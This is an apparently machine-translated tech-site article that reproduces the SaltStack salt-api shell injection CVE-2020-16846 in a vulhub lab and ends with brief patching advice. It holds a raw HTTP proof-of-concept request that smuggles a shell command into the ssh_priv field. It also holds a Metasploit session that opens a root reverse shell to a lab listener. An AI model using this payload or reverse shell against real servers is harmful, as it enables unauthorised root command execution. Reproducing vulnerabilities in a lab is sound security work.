Shulou(Shulou.com)05/31 Report--

This article will explain in detail how to understand the SaltStack Shell injection vulnerability CVE-2020-16846. The content of the article is of high quality, so the editor shares it for you as a reference. I hope you will have some understanding of the relevant knowledge after reading this article.

Recurrence of SaltStack Shell injection (CVE-2020-16846) vulnerability

I. brief introduction of loopholes

SaltStack is a distributed OPS system, which is widely used in Internet scenarios. It has the following two main functions:

Configuration management system that can maintain remote nodes in a predefined state

Distributed remote execution system for executing commands and querying data on remote nodes individually or through arbitrary selection criteria

A combination of CVE-2020-16846 and CVE-2020-25592 can execute arbitrary commands through the salt-api interface without authorization. CVE-2020-25592 allows any user to call the SSH module, and CVE-2020-16846 allows the user to execute arbitrary commands. Although salt-api is not enabled by default, the vast majority of SaltStack users will choose to enable salt-api, so there is a high risk.

Second, environmental construction

Download environment:

Https://github.com/vulhub/vulhub/tree/master/saltstack/CVE-2020-16846

Or reply from the backend: CVE-2020-16846 download environment

Environment startup: docker-compose up-d

Access address: https://192.168.1.107:8000/

III. Recurrence of loopholes

POC

POST / run HTTP/1.1Host: 192.168.1.107:8000User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:68.0) Gecko/20100101 Firefox/68.0Accept: application/x-yamlAccept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateDNT: 1Connection: closeUpgrade-Insecure-Requests: 1Content-Type: application/x-www-form-urlencodedContent-Length: 91token=12312&client=ssh&tgt=*&fun=a&roster=whip1ash&ssh_priv=aaa | touch%20/tmp/success%3b

Execute poc

Touch file succeeded

There is exp in msf.

Exploit/linux/http/saltstack_salt_api_cmd_exec

Use exploit/linux/http/saltstack_salt_api_cmd_execmsf6 exploit (linux/http/saltstack_salt_api_cmd_exec) > set rhosts 192.168.1.107rhosts = > 192.168.1.107msf6 exploit (linux/http/saltstack_salt_api_cmd_exec) > set rport 8000rport = > 8000msf6 exploit (linux/http/saltstack_salt_api_cmd_exec) > set LhOST 192.168.1.117LhOST = > 192.168.1.117msf6 exploit (linux/http/saltstack_salt_api_cmd_) Exec) > set LPORT 4444LPORT = > 4444msf6 exploit (linux/http/saltstack_salt_api_cmd_exec) > show options Module options (exploit/linux/http/saltstack_salt_api_cmd_exec): Name Current Setting Required Description-Proxies no A proxy chain of format type:host:port [ Type:host:port] [...] RHOSTS 192.168.1.107 yes The target host (s), range CIDR identifier, or hosts file with syntax 'file:' RPORT 8000 yes The target port (TCP) SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses. SRVPORT 8080 yes The local port to listen on. SSL true no Negotiate SSL/TLS for outgoing connections SSLCert no Path to a custom SSL certificate (default is randomly generated) TARGETURI / yes Base path URIPATH no The URI to use for this exploit (default is random) VHOST no HTTP server virtual hostPayload options (cmd / unix/reverse_python_ssl): Name Current Setting Required Description-LHOST 192.168.1.117 yes The listen address (an interface may be specified) LPORT 4444 yes The listen portExploit target: Id Name-0 Unix Commandmsf6 exploit ( Linux/http/saltstack_salt_api_cmd_exec) > exploit [*] Started reverse SSL handler on 192.168.1.117Executing automatic check [*] Executing automatic check (disable AutoCheck to override) [+] The target is vulnerable. Auth bypass successful. [*] Executing Unix Command for cmd/unix/reverse_python_ssl [*] Command shell session 2 opened (192.168.1.117 opened > 192.168.1.107 Command shell session 50332) at 2020-12-21 22:34:40 + 0800iduid=0 (root) gid=0 (root) groups=0 (root) IV

1. Fix it as soon as possible. As the official upgrade package has not been released, it still needs to be fixed manually. Here is the official security notice and fix.

two。 If you do not have to use salt-api, turn off this feature.

On the SaltStack Shell injection vulnerability CVE-2020-16846 how to understand the sharing here, I hope that the above content can be of some help to you, can learn more knowledge. If you think the article is good, you can share it for more people to see.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.